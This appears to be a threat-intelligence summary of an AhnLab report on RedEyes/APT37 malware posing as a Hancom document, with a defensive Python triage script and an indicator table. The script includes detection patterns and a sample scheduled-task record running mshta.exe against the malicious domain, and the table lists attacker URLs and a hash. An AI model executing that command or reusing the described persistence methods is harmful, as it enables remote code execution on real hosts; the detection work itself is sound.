Tracking traces of malware being distributed disguised as Hancom Office document files (RedEyes)

2023-05-25, AhnLab (original Korean title: 한컴 오피스 문서파일로 위장하여 유포중인 악성코드 증적 추적(RedEyes))

https://asec.ahnlab.com/ko/53273/


AhnLab observed malware distributed as an executable that carries a Hancom Office document icon and a file name resembling a Korean-language newspaper column, and linked the activity to RedEyes/APT37 infrastructure. When executed, the malware copies itself under AppData as onedrivenew.exe, drops and opens a decoy Hancom document, injects into the legitimate mstsc.exe process, and deletes the original file via cmd.exe. It establishes persistence with a Run-key entry named onedrivenew and registers a scheduled task, OneDriveOp, that invokes mshta.exe every 60 minutes against a URL hosted on a compromised legitimate website. AhnLab notes that the web shell planted on that site matches prior RedEyes/APT37 targeting of website-production firms, and provides representative indicators including the MD5 93fc0fb9b87a00b38f18c1cc4ee02e50 and ingarchi.com URLs.
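The two persistence artifacts above (the onedrivenew Run value and the OneDriveOp task calling mshta.exe with a remote URL on a 60-minute schedule) are the kind of thing a host inventory can be triaged for. The following is an added example, not AhnLab's code; it assumes Run-key values and scheduled tasks have already been exported into simple records, and the sample records are constructed, with the URL path replaced by a placeholder because the report truncates it.

```python
import re
from typing import Dict, List

# Indicators taken from the report summary above (matched case-insensitively).
REPORTED_RUN_VALUE = "onedrivenew"
REPORTED_TASK_NAME = "onedriveop"
REPORTED_DOMAIN = "ingarchi.com"

# mshta.exe launched with a remote http(s) URL as its argument (remote HTA fetch).
MSHTA_REMOTE = re.compile(r'mshta(?:\.exe)?"?\s+"?(https?://[^\s"]+)', re.IGNORECASE)
# Folder where a genuine OneDrive binary lives; OneDrive-named entries elsewhere are suspect.
GENUINE_ONEDRIVE_DIR = re.compile(r"\\Microsoft\\OneDrive\\", re.IGNORECASE)

# Constructed sample records (assumption: produced by a host-inventory export; not real telemetry).
RUN_KEY_VALUES = [
    {"name": "OneDrive", "command": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"name": "onedrivenew", "command": r"C:\Users\u\AppData\Roaming\onedrivenew.exe"},
]
SCHEDULED_TASKS = [
    {"name": "OneDriveOp", "action": r"C:\Windows\System32\mshta.exe http://ingarchi.com/PLACEHOLDER_PATH", "interval_minutes": 60},
    {"name": "OneDrive Standalone Update Task", "action": r"%LOCALAPPDATA%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe", "interval_minutes": 1440},
]


def triage_run_values(values: List[Dict]) -> List[Dict]:
    """Flag Run-key values that match the reported entry or impersonate OneDrive."""
    findings = []
    for v in values:
        name, cmd = v["name"], v["command"]
        reasons = []
        if name.lower() == REPORTED_RUN_VALUE:
            reasons.append("Run value name matches the reported RedEyes entry")
        if "onedrive" in name.lower() and not GENUINE_ONEDRIVE_DIR.search(cmd):
            reasons.append("OneDrive-like name but binary outside the Microsoft\\OneDrive folder")
        if reasons:
            findings.append({"kind": "run_value", "name": name, "reasons": reasons})
    return findings


def triage_tasks(tasks: List[Dict]) -> List[Dict]:
    """Flag tasks that run mshta.exe against a remote URL; note reported name, domain and interval."""
    findings = []
    for t in tasks:
        reasons = []
        m = MSHTA_REMOTE.search(t["action"])
        if m:
            reasons.append(f"mshta.exe fetches remote content from {m.group(1)}")
            if REPORTED_DOMAIN in m.group(1).lower():
                reasons.append("URL host matches the reported domain")
            if t.get("interval_minutes") == 60:
                reasons.append("60-minute repetition matches the reported schedule")
        if t["name"].lower() == REPORTED_TASK_NAME:
            reasons.append("task name matches the reported RedEyes task")
        if reasons:
            findings.append({"kind": "scheduled_task", "name": t["name"], "reasons": reasons})
    return findings
```

A task running mshta.exe with a local .hta path does not match MSHTA_REMOTE, so only remote-fetch tasks are raised on that rule.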

Indicators of Compromise

Type    Value                               First Seen  Last Seen
HASH    93fc0fb9b87a00b38f18c1cc4ee02e50    2023-05-25  2023-06-01
URL     http://ingarchi.com/bbs/data/cu…    2023-05-25  2023-06-01
URL     http://ingarchi.com/bbs/data/cu…    2023-05-25  2023-06-01
DOMAIN  ingarchi.com                        2023-05-25  2023-06-01
